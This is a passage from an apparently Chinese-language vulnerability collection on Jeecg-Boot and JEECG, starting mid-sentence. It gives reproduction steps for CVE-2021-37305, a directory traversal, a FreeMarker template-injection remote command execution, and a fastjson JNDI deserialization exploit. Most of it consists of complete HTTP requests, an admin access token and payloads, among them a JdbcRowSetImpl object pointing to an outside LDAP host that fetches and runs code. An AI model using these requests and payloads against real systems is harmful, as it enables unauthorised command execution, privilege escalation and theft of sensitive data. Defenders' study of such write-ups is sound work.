2.4.5及之前版本存在不安全权限漏洞。攻击者可利用该漏洞通过uri:/sys/user/checkOnlyUser?username=admin提升权限并查看敏感信息。漏洞复现/jeecg-boot/sys/user/querySysUser?username=adminjeecg-boot-querySysUser信息泄露漏洞(CVE-2021-37305)漏洞简介Jeecg-Boot 2.4.5及之前版本存在不安全权限漏洞。攻击者可利用该漏洞通过uri: /sys/user/querySysUser?username=admin提升权限并查看敏感信息。漏洞复现/jeecg-boot/sys/user/querySysUser?username=adminjeecg-boot-目录遍历漏洞漏洞简介低权限账号访问http://localhost:8080/jeecg-boot/online/cgform/head/fileTree?_t=1632524014&parentPath=/直接返回服务器文件目录信息漏洞复现jeecg-boot后台/sysMessageTemplate/sendMsg接口freemaker模板注入漏洞描述Freemarker模板注入导致远程命令执行, 远程攻击者可利用该漏洞调用在系统上执行任意命令。漏洞危害等级：高危漏洞复现1、添加一个测试模板POST /jeecg-boot/sys/message/sysMessageTemplate/add HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: application/json, text/plain, /Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2aoTenant-Id: 0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePriority: u=0Te: trailersConnection: closeContent-Type: application/json;charset=UTF-8Content-Length: 141{“templateType”:”1″,”templateCode”:”5″,”templateName”:”test111″,”templateContent”:”${\”freemarker.template.utility.Execute\”?new()(\”id\”)}”}2、发送模板POST /jeecg-boot/sys/message/sysMessageTemplate/sendMsg HTTP/1.1Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: application/json, text/plain, /Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2aoTenant-Id: 0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePriority: u=0Te: trailersConnection: closeContent-Type: application/json;charset=UTF-8Content-Length: 64{“templateCode”:”5″,”testData”:”{}”,”receiver”:””,”msgType”:”1″}3、执行模板并查看返回结果GET /jeecg-boot/sys/message/sysMessage/list?_t=1732776144&column=createTime&order=desc&field=id,,,esTitle,esContent,esReceiver,esSendNum,esSendStatus_dictText,esSendTime,esType_dictText,action&pageNo=1&pageSize=10 HTTP/1.1Host:User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:133.0) Gecko/20100101 Firefox/133.0Accept: application/json, text/plain, /Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzYyMTcyNDQsInVzZXJuYW1lIjoiYWRtaW4ifQ.-Z6FINUMTWQkOR6u009cde9BFyb-l65VWRhUXDz_2aoTenant-Id: 0Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: cross-sitePriority: u=0Te: trailersConnection: closeAccept-Encoding: gzipJeecg-jeecgFormDemoController存在JNDI代码执行漏洞漏洞简介JEECG 4.0 及之前版本中，由于 /api 接口鉴权时未过滤路径遍历，攻击者可构造包含 ../ 的 url 绕过鉴权。因为依赖 1.2.31 版本的 fastjson，该版本存在反序列化漏洞。攻击者可对 /api/../jeecgFormDemoController.do?interfaceTest 接口进行 jndi 注入攻击实现远程代码执行漏洞pocPOST /api/../jeecgFormDemoController.do?interfaceTest= HTTP/1.1Host: Pragma: no-cacheCache-Control: no-cacheUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brcmd: whoamiAccept-Language: zh-CN,zh;q=0.9Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 77serverUrl=http://xxxxxxxx:8877/jeecg.txt&requestBody=1&requestMethod=GET创建如下远程文件，其内容为fastjson代码执行的payload { “a”:{ “@type”:”java.lang.Class”, “val”:”com.sun.rowset.JdbcRowSetImpl” }, “b”:{ “@type”:”com.sun.rowset.JdbcRowSetImpl”, “dataSourceName”:”ldap://10.66.64.89:1389/8orsiq”, “autoCommit”:true } }